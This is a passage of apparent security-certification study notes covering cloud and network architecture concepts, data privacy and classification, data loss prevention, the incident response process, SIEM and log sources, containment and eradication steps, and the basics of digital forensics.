○ Simple Object Access Protocol (SOAP)—uses XML format messaging
and has a number of extensions in the form of Web Services (WS)
standards that support common features, such as authentication, transport
security, and asynchronous messaging. SOAP also has a built-in error
handling.
○ Representational State Transfer (REST)—where SOAP is a tightly
specified protocol, REST is a looser architectural framework, also referred
to as RESTful APIs.
■ Where a SOAP request must be sent as a correctly formatted XML
document, a REST request can be submitted as an HTTP
operation/verb (GET or POST for example). Each resource or
endpoint in the API, expressed as a noun, should be accessed via
a single URL.

Serverless Architecture
● Serverless is a modern design pattern for service delivery. It is strongly
associated with modern web applications—most notably Netflix.
● With serverless, all the architecture is hosted within a cloud, but unlike
"traditional" virtual private cloud (VPC) offerings, services such as authentication,
web applications, and communications aren't developed and managed as
applications running on VM instances located within the cloud.
● The serverless paradigm eliminates the need to manage physical or virtual
server instances, so there is no management effort for software and patches,
administration privileges, or file system security monitoring.

Infrastructure as Code
● A provisioning architecture in which deployment of resources is performed by
scripted automation and orchestration.
● One of the goals of IaC is to eliminate snowflake systems.
 ○ A snowflake is a configuration or build that is different from any other.
○ The lack of consistency—or drift—in the platform environment leads to
security issues, such as patches that have not been installed, and stability
issues, such as scripts that fail to run because of some small configuration
difference.
● Idempotence: In an IaC architecture, the property that an automation or
orchestration action always produces the same result, regardless of the
component's previous state.

Software-Defined Networking
● In this model, network functions can be divided into three "planes":
○ Control plane—makes decisions about how traffic should be prioritized
and secured, and where it should be switched.
○ Data plane—handles the actual switching and routing of traffic and
imposition of security access controls.
○ Management plane—monitors traffic conditions and network status.
● A software-defined networking (SDN) application can be used to define policy
decisions on the control plane.
○ These decisions are then implemented on the data plane by a network
controller application, which interfaces with the network devices using
APIs.
○ The interface between the SDN applications and the SDN controller is
described as the "northbound" API, while that between the controller and
appliances is the "southbound" API.

Software-Defined Visibility
● APIs for reporting configuration and state data for automated monitoring and
alerting.
● Visibility is the near real-time collection, aggregation, and reporting of data about
network traffic flows and the configuration and status of all the hosts,
applications, and user accounts participating in it.
Fog and Edge Computing
● However, a very large and increasing amount of cloud data processing takes
place with data generated by Internet of Things (IoT) devices and sensors.
● Fog Computing: Provisioning processing resource between the network edge of
IoT devices and the data center to reduce latency.
● Edge computing is a broader concept partially developed from fog computing
and partially evolved in parallel to it.
● Edge computing uses the following concepts:
○ Edge devices are those that collect and depend upon data for their
operation.
■ For example, a thermometer in an HVAC system collects
temperature data; the controller in an HVAC system activates the
electromechanical components to turn the heating or air
conditioning on or off in response to ambient temperature changes.
○ Edge gateways perform some pre-processing of data to and from edge
devices to enable prioritization.

Lesson 16: Explaining Data Privacy and Protection Concepts

Privacy and Sensitive Data Concepts

● Privacy versus Security:
○ Privacy is a data governance requirement that arises when collecting and
processing personal data.
○ privacy requires policies to identify private data, ensure that storage,
processing, and retention is compliant with relevant regulations, limit
access to the private data to authorized persons only, and ensure the
rights of data subjects to review and remove any information held about
them are met.
● Information Life Cycle Management:
 ○ Creation/collection—data may be generated by an employee or
automated system, or it may be submitted by a customer or supplier. At
this stage, the data needs to be classified and tagged.
○ Distribution/use—data is made available on a need to know basis for
authorized uses by authenticated account holders and third parties.
○ Retention—for regulatory reasons, data might have to be kept in an
archive past the date when it is still used.
○ Disposal—when it no longer needs to be used or retained, media storing
data assets must be sanitized to remove any remnants.

Data Roles and Responsibilities

● Data Governance: The overall management of the availability, usability, and
security of the information used in an organization.
● There are important institutional governance roles for oversight and management
of information assets within the life cycle:
○ Data owner—a senior (executive) role with ultimate responsibility for
maintaining the confidentiality, integrity, and availability of the information
asset.
○ Data steward—this role is primarily responsible for data quality.
■ This involves tasks such as ensuring data is labeled and identified
with appropriate metadata and that data is collected and stored in a
format and with values that comply with applicable laws and
regulations.
○ Data custodian—this role handles managing the system on which the
data assets are stored.
○ Data Privacy Officer (DPO)—this role is responsible for oversight of any
personally identifiable information (PII) assets managed by the company.
● In the context of legislation and regulations protecting personal privacy, the
following two institutional roles are important:
 ○ Data controller—the entity responsible for determining why and how data
is stored, collected, and used and for ensuring that these purposes and
means are lawful.
○ Data processor—an entity engaged by the data controller to assist with
technical collection, storage, or analysis tasks.

Data Classifications
● Data classification and typing schemas tag data assets so that they can be
managed through the information life cycle.
● Many data classification schemas are based on the degree of confidentiality
required:
○ Public (unclassified)—there are no restrictions on viewing the data.
■ Public information presents no risk to an organization if it is
disclosed but does present a risk if it is modified or not available.
○ Confidential (secret)—the information is highly sensitive, for viewing only
by approved persons within the owner organization, and possibly by
trusted third parties under NDA.
○ Critical (top secret)—the information is too valuable to allow any risk of its
capture. Viewing is severely restricted.
● Another type of classification schema identifies the kind of information asset:
○ Proprietary—proprietary information or intellectual property (IP) is
information created and owned by the company, typically about the
products or services that they make or perform.
○ Private/personal data—information that relates to an individual identity.
○ Sensitive—This label is typically used in the context of personal data in
which privacy-sensitive information about a subject could harm them if
made public and could prejudice decisions made about the subject.

Data Types
● Personally Identifiable Information (PII):
 ○ Personally identifiable information (PII) is data that can be used to
identify, contact, or locate an individual.
○ A Social Security Number (SSN) is a good example of PII.
○ Some types of information may be PII depending on the context.
■ For example, when someone browses the web using a static IP
address, the IP address is PII.
● Customer Data:
○ Customer data can be institutional information, but also personal
information about the customer's employees, such as sales and technical
support contacts.
○ Institutional information might be shared under a nondisclosure agreement
(NDA), placing contractual obligations on storing and processing it
securely.
● Health Information:
○ Personal health information (PHI)—or protected health information—
refers to medical and insurance records, plus associated hospital and
laboratory test results.
● Financial Information:
○ Financial information refers to data held about bank and investment
accounts, plus information such as payroll and tax returns.

Privacy Notices and Data Retention

● Privacy Notices:
○ Informed consent means that the data must be collected and processed
only for the stated purpose, and that purpose must be clearly described to
the user in plain language, not legalese.
○ Data collected under that consent statement cannot then be used for any
other purpose.
○ Purpose Limitation: In data protection, the principle that personal
information can be collected and processed only for a stated purpose to
which the subject has consented.
 ● Impact Assessments:
○ A data protection impact assessment is a process designed to identify the
risks of collecting and processing personal data in the context of a
business workflow or project and to identify mechanisms that mitigate
those risks.
● Data Retention:
○ Data retention refers to backing up and archiving information assets in
order to comply with business policies and/or applicable laws and
regulations.

Data Sovereignty and Geographical Considerations

● Data Sovereignty:
○ Data sovereignty refers to a jurisdiction preventing or restricting
processing and storage from taking place on systems which do not
physically reside within that jurisdiction.
● Geographical Considerations:
○ Geographic access requirements fall into two different scenarios:
■ Storage locations might have to be carefully selected to mitigate
data sovereignty issues. Most cloud providers allow choice of data
centers for processing and storage, ensuring that information is not
illegally transferred from a particular privacy jurisdiction without
consent.
■ Employees needing access from multiple geographic locations.
Cloud-based file and database services can apply constraint-based
access controls to validate the user's geographic location before
authorizing access.

Privacy Breaches and Data Breaches

● A data breach occurs when information is read, modified, or deleted without
authorization.
● Escalation:
 ○ Any breach of personal data and most breaches of IP should be
escalated to senior decision-makers and any impacts from legislation and
regulation properly considered.

Data Sharing and Privacy Terms of Agreement

● Service level agreement (SLA)—a contractual agreement setting out the detailed
terms under which a service is provided.
● Interconnection security agreement (ISA)—ISAs are defined by NIST's
SP800-47 "Managing the Security of Information Exchanges".
○ Any federal agency interconnecting its IT system to a third party must
create an ISA to govern the relationship.
● Nondisclosure agreement (NDA)—legal basis for protecting information assets.
● Data sharing and use agreement—under privacy regulations such as GDPR or
HIPAA, personal data can only be collected for a specific purpose.

Data Protection
● Data at rest—this state means that the data is in some sort of persistent storage
media.
○ In this state, it is usually possible to encrypt the data, using techniques
such as whole disk encryption, database encryption, and file- or folder-
level encryption.
● Data in transit (or data in motion)—this is the state when data is transmitted
over a network.
○ In this state, data can be protected by a transport encryption protocol,
such as TLS or IPSec.
● Data in use (or data in processing)—this is the state when data is present in
volatile memory, such as system RAM or CPU registers and cache.
○ However, trusted execution environment (TEE) mechanisms, such as Intel
Software Guard Extensions are able to encrypt data as it exists in
memory, so that an untrusted process cannot decode the information.
Data Exfiltration
● Unauthorized copying or retrieval of data from a system is referred to as data
exfiltration.
● Data exfiltration can take place via a wide variety of mechanisms, including:
○ Copying the data to removable media or other device with storage, such
as USB drive, the memory card in a digital camera, or a smartphone.
○ Using a network protocol, such as HTTP, FTP, SSH, email, or Instant
Messaging (IM)/chat.
■ A sophisticated adversary might use a Remote Access Trojan
(RAT) to perform transfer of data over a nonstandard network port
or a packet crafter to transfer data over a standard port in a
nonstandard way.
○ By communicating it orally over a telephone, cell phone, or Voice over IP
(VoIP) network. Cell phone text messaging is another possibility.
○ Using a picture or video of the data—if text information is converted to an
image format it is very difficult for a computer-based detection system to
identify the original information from the image data.

Data Loss Prevention

● Data loss prevention (DLP) products automate the discovery and classification
of data types and enforce rules so that data is not viewed or transferred without a
proper authorization.
● Such solutions will usually consist of the following components:
○ Policy server—to configure classification, confidentiality, and privacy rules
and policies, log incidents, and compile reports.
○ Endpoint agents—to enforce policy on client computers, even when they
are not connected to the network.
○ Network agents—to scan communications at network borders and
interface with web and messaging servers to enforce policy.
● A file cracking process is applied to unstructured data to render it in a consistent
scannable format.
 ○ The transfer of content to removable media, such as USB devices, or by
email, instant messaging, or even social media, can then be blocked if it
does not conform to a predefined policy.
● Remediation is the action the DLP software takes when it detects a policy
violation.
● The following remediation mechanisms are typical:
○ Alert only—the copying is allowed, but the management system records
an incident and may alert an administrator.
○ Block—the user is prevented from copying the original file but retains
access to it. The user may or may not be alerted to the policy violation, but
it will be logged as an incident by the management engine.
○ Quarantine—access to the original file is denied to the user (or possibly
any user). This might be accomplished by encrypting the file in place or by
moving it to a quarantine area in the file system.
○ Tombstone—the original file is quarantined and replaced with one
describing the policy violation and how the user can release it again.

Rights Management Services

● Microsoft provides an Information Rights Management (IRM) feature in their
Office productivity suite, SharePoint document collaboration services, and
Exchange messaging server.
● IRM works with the Active Directory Rights Management Services (RMS) or the
cloud-based Azure Information Protection.
● These technologies provide administrators with the following functionality:
○ Assign file permissions for different document roles, such as author,
editor, or reviewer.
○ Restrict printing and forwarding of documents, even when sent as file
attachments.
○ Restrict printing and forwarding of email messages.
Privacy Enhancing Technologies
● Data minimization is the principle that data should only be processed and
stored if that is necessary to perform the purpose for which it is collected.
● It is necessary to track how long a data point has been stored for since it was
collected and whether continued retention supports a legitimate processing
function.
● De Identification: In data protection, methods and technologies that remove
identifying information from data before it is distributed.
○ Deidentification methods may also be used where personal data is
collected to perform a transaction but does not need to be retained
thereafter.
■ For example, a company uses a customer's credit card number to
take payment for an order. When storing the order details, it only
keeps the final 4 digits of the card as part of the transaction log,
rather than the full card number.
● Pseudo Anonymization: Modifying or replacing identifying personal information in
a data set so that reidentification depends on an alternate data source.

Database De Identification Methods

● Data Masking:
○ Data masking can mean that all or part of the contents of a field are
redacted, by substituting all character strings with "x" for example.
○ For example, in a telephone number, the dialing prefix might be retained,
but the subscriber number redacted.
● Tokenization:
○ Tokenization means that all or part of data in a field is replaced with a
randomly generated token.
○ An authorized query or app can retrieve the original value from the vault, if
necessary, so tokenization is a reversible technique.
● Aggregation/Banding:
 ○ Another deidentification technique is to generalize the data, such as
substituting a specific age with a broader age band.
● Hashing and Salting:
○ A cryptographic hash produces a fixed-length string from arbitrary-length
plaintext data using an algorithm such as SHA.

Lesson 17: Performing Incident Response

Incident Response Process

● Incident response policy sets the resources, processes, and guidelines for
dealing with security incidents.
● Incident response follows a well-structured process, such as that set out in the
NIST Computer Security Incident Handling Guide special publication.
● The following are the principal stages in an incident response life cycle:
○ 1. Preparation—make the system resilient to attack in the first place.
■ This includes hardening systems, writing policies and procedures,
and setting up confidential lines of communication.
○ 2. Identification—from the information in an alert or report, determine
whether an incident has taken place, assess how severe it might be
(triage), and notify stakeholders.
○ 3. Containment—limit the scope and magnitude of the incident.
■ The principal aim of incident response is to secure data while
limiting the immediate impact on customers and business partners.
○ 4. Eradication—once the incident is contained, remove the cause and
restore the affected system to a secure state by wiping a system and
applying secure configuration settings.
○ 5. Recovery—with the cause of the incident eradicated, the system can be
reintegrated into the business process that it supports.
■ Applying patches and updates to a system to help prevent future
incidents is important as well.
 ○ 6. Lessons learned—analyze the incident and responses to identify
whether procedures or systems could be improved.

Cyber Incident Response Team

● In order to identify and manage incidents, you should develop some method of
reporting, categorizing, and prioritizing them (triage), in the same way that
troubleshooting support incidents can be logged and managed.
● Large organizations will provide a dedicated team as a single point-of-contact for
the notification of security incidents.
○ This team is variously described as a cyber incident response team
(CIRT), computer security incident response team (CSIRT), or computer
emergency response team (CERT).

Communications Plan and Stakeholder Management

● Call List: A document listing authorized contacts for notification and collaboration
during a security incident.
● For file and data exchange, there should be a messaging system with end-to-end
encryption, such as Off-the-Record (OTR), Signal, or WhatsApp, or an external
email system with message encryption (S/MIME or PGP).

Incident Response Plan

● An incident response plan (IRP) lists the procedures, contacts, and resources
available to responders for various incident categories.
● A playbook (or runbook) is a data-driven standard operating procedure (SOP) to
assist junior analysts in detecting and responding to specific cyberthreat
scenarios, such as phishing attempts, SQL injection data exfiltration, connection
to a block-listed IP range, and so on.
● One challenge in incident management is to allocate resources efficiently.
○ Data integrity—the most important factor in prioritizing incidents will often
be the value of data that is at risk.
 ○ Downtime—another very important factor is the degree to which an
incident disrupts business processes.
○ Economic/publicity—both data integrity and downtime will have important
economic effects, both in the short term and the long term.
○ Scope—the scope of an incident (broadly the number of systems affected)
is not a direct indicator of priority.
○ Detection time—research has shown that the existence of more than half
of data breaches are not detected for weeks or months after the intrusion
occurs, while in a successful intrusion, data is typically breached within
minutes.
○ Recovery time—some incidents require lengthy remediation as the system
changes required are complex to implement.

Cyber Kill Chain Attack Framework

● A key tool for threat research is a framework to use to describe the stages of an
attack.
○ These stages are often referred to as a cyber kill chain, following the
influential white paper Intelligence-Driven Computer Network Defense
commissioned by Lockheed Martin.
● 1. Reconnaissance—in this stage the attacker determines what methods to use
to complete the phases of the attack and gathers information about the target's
personnel, computer systems, and supply chain.
● 2. Weaponization—the attacker couples payload code that will enable access
with exploit code that will use a vulnerability to execute on the target system.
● 3. Delivery—the attacker identifies a vector by which to transmit the weaponized
code to the target environment, such as via an email attachment or on a USB
drive.
● 4. Exploitation—the weaponized code is executed on the target system by this
mechanism. For example, a phishing email may trick the user into running the
code, while a drive-by-download would execute on a vulnerable system without
user intervention.
 ● 5. Installation—this mechanism enables the weaponized code to run a remote
access tool and achieve persistence on the target system.
● 6. Command and control (C2 or C&C)—the weaponized code establishes an
outbound channel to a remote server that can then be used to control the remote
access tool and possibly download additional tools to progress the attack.
● 7. Actions on objectives—in this phase, the attacker typically uses the access
achieved to covertly collect information from target systems and transfer it to a
remote system (data exfiltration). An attacker may have other goals or motives,
however.

Other Attack Frameworks

● MITRE ATT&CK:
○ A knowledge base maintained by the MITRE Corporation for listing and
explaining specific adversary tactics, techniques, and procedures.
○ It tags each technique with a unique ID and places it in one or more tactic
categories, such as initial access, persistence, lateral movement, or
command and control.
● The Diamond Model of Intrusion Analysis:
○ The Diamond Model of Intrusion Analysis suggests a framework to
analyze an intrusion event (E) by exploring the relationships between four
core features: adversary, capability, infrastructure, and victim.

○
Incident Response Exercises
● Training on specific incident response scenarios can use three forms:
○ Tabletop—this is the least costly type of training. The facilitator presents a
scenario and the responders explain what action they would take to
identify, contain, and eradicate the threat.
○ Walkthroughs—in this model, a facilitator presents the scenario as for a
tabletop exercise, but the incident responders demonstrate what actions
they would take in response.
○ Simulations—a simulation is a team-based exercise, where the red team
attempts an intrusion, the blue team operates response and recovery
controls, and a white team moderates and evaluates the exercise.

Incident Response, Disaster Recovery, and Retention Policy

● You should distinguish specific incident response planning from other types of
planning for disaster recovery and business continuity:
○ Disaster recovery plan—a disaster can be seen as a special class of
incident where the organization's primary business function is disrupted.
■ Disaster recovery requires considerable resources, such as shifting
processing to a secondary site. Disaster recovery will involve a
wider range of stakeholders than less serious incidents.
○ Business continuity plan (BCP)—this identifies how business processes
should deal with both minor and disaster-level disruption.
■ Continuity planning ensures that there is processing redundancy
supporting the workflow, so that when a server is taken offline for
security remediation, processing can failover to a separate system.
○ Continuity of Operation Planning (COOP)—this terminology is used for
government facilities, but is functionally similar to business continuity
planning.
● Retention Policy: Dictates for how long information needs to be kept available on
backup and archive systems. This may be subject to legislative requirements.
Incident Identification
● There are multiple channels by which events or precursors may be recorded:
○ Using log files, error messages, IDS alerts, firewall alerts, and other
resources to establish baselines and identifying those parameters that
indicate a possible security incident.
○ Comparing deviations to established metrics to recognize incidents and
their scopes.
○ Manual or physical inspections of site, premises, networks, and hosts.
○ Notification by an employee, customer, or supplier.
○ Public reporting of new vulnerabilities or threats by a system vendor,
regulator, the media, or other outside party.
● First Responder:
○ The first experienced person or team to arrive at the scene of an incident.
● Analysis and Incident Identification:
○ Analysis will depend on identifying the type of incident and the data or
resources affected (its scope and impact).
○ At this point, the incident management database should have a record of
the event indicators, the nature of the incident, its impact, and the incident
investigator responsible.

Security Information and Event Management

● Incident analysis is greatly facilitated by a security information and event
management (SIEM) system.
● A SIEM parses network traffic and log data from multiple sensors, appliances,
and hosts and normalizes the information to standard field types.
● Correlation:
○ Correlation means interpreting the relationship between individual data
points to diagnose incidents of significance to the security team.
○ These rules use logical expressions, such as AND and OR, and operators,
such as == (matches), < (less than), > (greater than), and in (contains).
SIEM Dashboards
● A SIEM dashboard provides a console to work from for day-to-day incident
response.
● An incident handler's dashboard will contain uncategorized events that have
been assigned to their account, plus visualizations (graphs and tables) showing
key status metrics.
● Sensitivity and Alerts:
○ One of the greatest challenges in operating a SIEM is tuning the system
sensitivity to reduce false positive indicators being reported as an event.
○ Log only—an event is produced and added to the SIEM's database, but it
is automatically classified.
○ Alert—the event is listed on a dashboard or incident handling system for
an agent to assess. The agent classifies the event and either dismisses it
to the log or escalates it as an incident.
○ Alarm—the event is automatically classified as critical and a priority alarm
is raised.
● Sensors:
○ A sensor is a network tap or port mirror that performs packet capture and
intrusion detection.

Trend Analysis
● Trend analysis is the process of detecting patterns or indicators within a data
set over a time series and using those patterns to make predictions about future
events.
● Trend analysis can apply to frequency, volume, or statistical deviation:
○ Frequency-based trend analysis establishes a baseline for a metric, such
as number of NXERROR DNS log events per hour of the day.
■ If the frequency exceeds (or in some cases undershoots) the
threshold for the baseline, then an alert is raised.
○ Volume-based trend analysis can be performed with simpler indicators.
 ■ For example, one simple metric for determining threat level is log
volume. If logs are growing much faster than they were previously,
there is a good chance that something needs investigating.
○ Statistical deviation analysis can show when a data point should be
treated as suspicious.
■ A data point that appears outside the two clusters for standard and
administrative users might indicate some suspicious activity by that
account.

Logging Platforms
● Syslog:
○ A protocol enabling different appliances and software applications to
transmit logs or event records to a central server.
○ For example, syslog messages can be generated by Cisco routers and
switches, as well as servers and workstations.
○ A syslog message comprises a PRI code, a header containing a
timestamp and host name, and a message part.
● Rsyslog and Syslog-ng:
○ There have been two updates to the original syslog specification:
■ Rsyslog uses the same configuration file syntax, but can work over
TCP and use a secure connection.
■ Syslog-ng uses a different configuration file syntax, but can also
use TCP/secure communications and more advanced options for
message filtering.
● Journalctl:
○ In Linux, text-based log files of the sort managed by syslog can be viewed
using commands such as cat, tail, and head.
○ Logs from processes managed by systemd are written to a binary-format
file called journald.
■ Events captured by journald can be forwarded to syslog.
● NXlog:
 ○ an open-source log normalization tool. One principal use for it is to collect
Windows logs, which use an XML-based format, and normalize them to a
syslog format.

Network, OS, and Security Log Files

● System and Security Logs:
○ One source of security information is the event log from each network
server or client.
○ Systems such as Microsoft Windows, Apple macOS, and Linux keep a
variety of logs to record events as users and software interact with the
system.
● The five main categories of Windows event logs are:
○ Application—events generated by applications and services, such as
when a service cannot start.
○ Security—Audit events, such as a failed logon or access to a file being
denied.
○ System—events generated by the operating system and its services, such
as storage volume health checks.
○ Setup—events generated during the installation of Windows.
○ Forwarded Events—events that are sent to the local log from other hosts.
● Network Logs:
○ Network logs are generated by appliances such as routers, firewalls,
switches, and access points.
○ Log files will record the operation and status of the appliance itself—the
system log for the appliance—plus traffic and access logs recording
network behavior, such as a host trying to use a port that is blocked by the
firewall, or an endpoint trying to use multiple MAC addresses when
connected to a switch.
● Authentication Logs:
○ Authentication attempts for each host are likely to be written to the security
log.
 ● Vulnerability Scan Output:
○ The scan engine might log or alert when a scan report contains
vulnerabilities.
○ The report can be analyzed to identify vulnerabilities that have not been
patched or configuration weaknesses that have not been remediated.

Application Log Files

● An application log file is simply one that is managed by the application rather
than the OS.
● The application may use Event Viewer or syslog to write event data using a
standard format, or it might write log files to its own application directories in
whatever format the developer has selected.
● DNS Event Logs:
○ A DNS server may log an event each time it handles a request to convert
between a domain name and an IP address.
○ DNS event logs can hold a variety of information that may supply useful
security intelligence, such as:
■ The types of queries a host has made to DNS.
■ Hosts that are in communication with suspicious IP address ranges
or domains.
■ Statistical anomalies such as spikes or consistently large numbers
of DNS lookup failures, which may point to computers that are
infected with malware, misconfigured, or running obsolete or faulty
applications.
● Web/HTTP Access Logs:
○ Web servers are typically configured to log HTTP traffic that encounters
an error or traffic that matches some predefined rule set.
○ The status code of a response can reveal quite a bit about both the
request and the server's behavior.
○ Codes in the 400 range indicate client-based errors, while codes in the
500 range indicate server-based errors.
 ○ For example, repeated 403 ("Forbidden") responses may indicate that the
server is rejecting a client's attempts to access resources they are not
authorized to.
○ A 502 ("Bad Gateway") response could indicate that communications
between the target server and its upstream server are being blocked, or
that the upstream server is down.
● VoIP and Call Manages and Session Initiation Protocol (SIP) Traffic:
○ Many VoIP systems use the Session Initiation Protocol (SIP) to identify
endpoints and setup calls.
○ The call content is transferred using a separate protocol, typically the
Real-time Transport Protocol (RTP).
○ The call manager is a gateway that connects endpoints within the local
network and over the Internet.
■ The call manager is also likely to implement a media gateway to
connect VoIP calls to cellphone and landline telephone networks.
○ SIP produces similar logs to SMTP, typically in the common log format.
■ A SIP log will identify the endpoints involved in a call request, plus
the type of connection (voice only or voice with video, for instance),
and status messaging.
● Dump Files:
○ A system memory dump creates an image file that can be analyzed to
identify the processes that are running, the contents of temporary file
systems, registry data, network connections, cryptographic keys, and
more.

Metadata
● Information stored or recorded as a property of an object, state of a system, or
transaction.
● A number of metadata sources are likely to be useful when investigating
incidents, because they can establish timeline questions, such as when and
where, as well as containing other types of evidence.
● File:
○ File metadata is stored as attributes.
○ The file system tracks when a file was created, accessed, and modified.
● Web:
○ When a client requests a resource from a web server, the server returns
the resource plus headers setting or describing its properties.
○ Also, the client can include headers in its request.
■ One key use of headers is to transmit authorization information, in
the form of cookies.
● Email:
○ An email's Internet header contains address information for the recipient
and sender, plus details of the servers handling transmission of the
message between them.
○ When an email is created, the mail user agent (MUA) creates an initial
header and forwards the message to a mail delivery agent (MDA).
■ The MDA should perform checks that the sender is authorized to
issue messages from the domain.
■ Assuming the email isn't being delivered locally at the same
domain, the MDA adds or amends its own header and then
transmits the message to a message transfer agent (MTA).
■ The MTA routes the message to the recipient, with the message
passing via one or more additional MTAs, such as SMTP servers
operated by ISPs or mail security gateways.
● Mobile:
○ Mobile phone metadata comprises call detail records (CDRs) of incoming,
outgoing, and attempted calls and SMS text time, duration, and the
opposite party's number.
○ If you are investigating a suspected insider attack, this metadata could
prove a suspect's whereabouts.
○ CDRs are generated and stored by the mobile operator.
Network Data Sources
● Network data is typically analyzed in detail at the level of individual frames or
using summary statistics of traffic flows and protocol usage.
● Protocol Analyzer Output:
○ A SIEM will store details from sensors at different points on the network.
○ Information captured from network packets can be aggregated and
summarized to show overall protocol usage and endpoint activity.
○ Typically, packet contents are only retained when indicators from the
traffic are correlated as an event.
● Netflow/IPFIX:
○ A flow collector is a means of recording metadata and statistics about
network traffic rather than recording each frame.
○ Network traffic and flow data may come from a wide variety of sources (or
probes), such as switches, routers, firewalls, web proxies, and so forth.
○ Flow analysis tools can provide features such as:
■ Highlighting of trends and patterns in traffic generated by particular
applications, hosts, and ports.
■ Alerting based on detection of anomalies, flow analysis patterns, or
custom triggers.
■ Visualization tools that enable you to quickly create a map of
network connections and interpret patterns of traffic and flow data.
■ Identification of traffic patterns revealing rogue user behavior,
malware in transit, tunneling, applications exceeding their allocated
bandwidth, and so forth.
■ Identification of attempts by malware to contact a handler or
command & control (C&C) channel.
● NetFlow is a Cisco-developed means of reporting network flow information to a
structured database.
○ NetFlow has been redeveloped as the IP Flow Information Export
(IPFIX) IETF standard
 ○ A particular traffic flow can be defined by packets sharing the same
characteristics, referred to as keys, such as IP source and destination
addresses and protocol type.
○ You can use a variety of NetFlow monitoring tools to capture data for
point-in-time analysis and to diagnose any security or operational issues
the network is experiencing.
● sFlow:
○ Web standard for using sampling to record network traffic statistics.
● Bandwidth Monitor:
○ Bandwidth usage can be a key indicator of suspicious behavior, if you
have reliable baselines for comparison.

Incident Containment
● Isolation-Based Containment:
○ Isolation involves removing an affected component from whatever larger
environment it is a part of.
○ A simple option is to disconnect the host from the network completely,
either by pulling the network plug (creating an air gap) or disabling its
switch port.
● Segmentation-Based Containment:
○ A means of achieving the isolation of a host or group of hosts using
network technologies and architecture.
○ Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent
a host or group of hosts from communicating outside the protected
segment.

Incident Eradication and Recovery

● After an incident has been contained, you can apply mitigation techniques and
controls to eradicate the intrusion tools and unauthorized configuration changes
from your systems.
 ● Eradicating malware, backdoors, and compromised accounts from individual
hosts is not the last step in incident response.
● Eradication of malware or other intrusion mechanisms and recovery from the
attack will involve several steps:
○ 1. Reconstitution of affected systems—either remove the malicious files or
tools from affected systems or restore the systems from secure
backups/images.
○ 2. Reaudit security controls—ensure they are not vulnerable to another
attack.
○ 3. Ensure that affected parties are notified and provided with the means to
remediate their own systems.
■ For example, if customers' passwords are stolen, they should be
advised to change the credentials for any other accounts where
that password might have been used (not good practice, but most
people do it).

Firewall Configuration Changes

● This analysis is used to identify configuration changes that block that attack
vector.
● A configuration change may mean the deployment of a new type of security
control, or altering the settings of an existing control to make it more effective.
● Some general guidelines for configuring egress filtering are:
○ Allow only authorized application ports and, if possible, restrict the
destination addresses to authorized Internet hosts.
○ Restrict DNS lookups to your own or your ISP's DNS services or
authorized public resolvers, such as Google's or Quad9's DNS services.
○ Block access to "known bad" IP address ranges, as listed on don't route or
peer (DROP) filter lists.
○ Block access from any IP address space that is not authorized for use on
your local network.
 ○ Block all Internet access from host subnets that do not need to connect to
the Internet, such as most types of internal server, workstations used to
manage industrial control systems (ICSs), and so on.

Content Filter Configuration Changes

● The limitations of a basic packet filtering firewall (even if it is stateful) mean that
some sort of content filtering application proxy may provide better security.
○ These types of appliances are usually referred to as secure web gateways
(SWGs).
○ A SWG mediates user access to Internet services, with the ability to block
content from regularly updated URL/domain/IP block lists and perform
intrusion detection/prevention on traffic based on matching content in
application layer protocol headers and payloads.
● Data Loss Prevention (DLP):
○ Data loss prevention (DLP) performs a similar function, but instead of user
access it mediates the copying of tagged data to restrict it to authorized
media and services.
● Update or Revoke Certificates:
○ Remove compromised root certificates—if an attacker has managed to
install a root certificate, the attacker can make malicious hosts and
services seem trusted.
○ Revoke certificates on compromised hosts—if a host is compromised, the
private key it used for digital signatures or digital envelopes is no longer
safe.

Endpoint Configuration Changes

● If endpoint security is breached, there are several classes of vector to consider
for mitigation:
○ Social engineering—if the malware was executed by a user, use security
education and awareness to reduce the risk of future attacks succeeding.
 ■ Review permissions to see if the account could be operated with a
lower privilege level.
○ Vulnerabilities—if the malware exploited a software fault, either install the
patch or isolate the system until a patch can be developed.
○ Lack of security controls—if the attack could have been prevented by
endpoint protection/A-V, host firewall, content filtering, DLP, or MDM,
investigate the possibility of deploying them to the endpoint.
○ Configuration drift—if the malware exploited an undocumented
configuration change (shadow IT software or an unauthorized service/port,
for instance), reapply the baseline configuration and investigate
configuration management procedures to prevent this type of ad hoc
change.
○ Weak configuration—if the configuration was correctly applied, but was
exploited anyway, review the template to devise more secure settings.
● Application Allow Lists and Block Lists:
○ An allow list (or approved list) denies execution unless the process is
explicitly authorized.
○ A block list (or deny list) generally allows execution, but explicitly prohibits
listed processes.
● Quarantine:
○ The process of isolating a file, computer system, or computer network to
prevent the spread of a virus or another cybersecurity incident.

Security Orchestration, Automation, and Response

● Automation is the action of scripting a single activity, while orchestration is the
action of coordinating multiple automations (and possibly manual activity) to
perform a complex, multi step task.
● Security Orchestration, Automation, and Response (SOAR):
 ○ A class of security tools that facilitates incident response, threat hunting,
and security configuration by orchestrating automated runbooks and
delivering data enrichment.
○ SOAR is designed as a solution to the problem of the volume of alerts
overwhelming analysts' ability to respond, measured as the mean time to
respond (MTTR).
○ It can also assist with provisioning tasks, such as creating and deleting
user accounts, making shares available, or launching VMs from templates,
to try to eliminate configuration errors.
● An incident response workflow is usually defined as a playbook.
○ A playbook is a checklist of actions to detect and respond to a specific
type of incident.
○ A playbook should be made highly specific by including the query strings
and signatures that will detect a particular type of incident.
○ Runbook: An automated version of a playbook that leaves clearly defined
interaction points for human analysis.

Adversarial Artificial Intelligence

● Artificial Intelligence (AI)-type systems are used extensively for User and Entity
Behavior Analytics (UEBA)
○ A UEBA is trained on security data from customer systems and
honeypots.
○ This allows the AI to determine features of malicious code and account
activity and to recognize those features in novel data streams.
● Adversarial AI: Using AI to identify vulnerabilities and attack vectors to
circumvent security systems.

Lesson 18: Explaining Digital Forensics

Key Aspects of Digital Forensics

 ● Digital forensics is the practice of collecting evidence from computer systems to
a standard that will be accepted in a court of law.
● Evidence, Documentation, and Admissibility:
○ Like DNA or fingerprints, digital evidence is latent
○ Latent means that the evidence cannot be seen with the naked eye;
rather, it must be interpreted using a machine or process.
● Due process is a term used in US and UK common law to require that people
only be convicted of crimes following the fair application of the laws of the land.
● Legal Hold:
○ Legal hold refers to the fact that information that may be relevant to a
court case must be preserved.
● Chain of Custody:
○ Chain of custody documentation reinforces the integrity and proper
handling of evidence from collection, to analysis, to storage, and finally to
presentation.

Digital Forensics Reports

● Analysis must be performed without bias. Conclusions and opinions should be

formed only from the direct evidence under analysis.
● Analysis methods must be repeatable by third parties with access to the same
evidence.
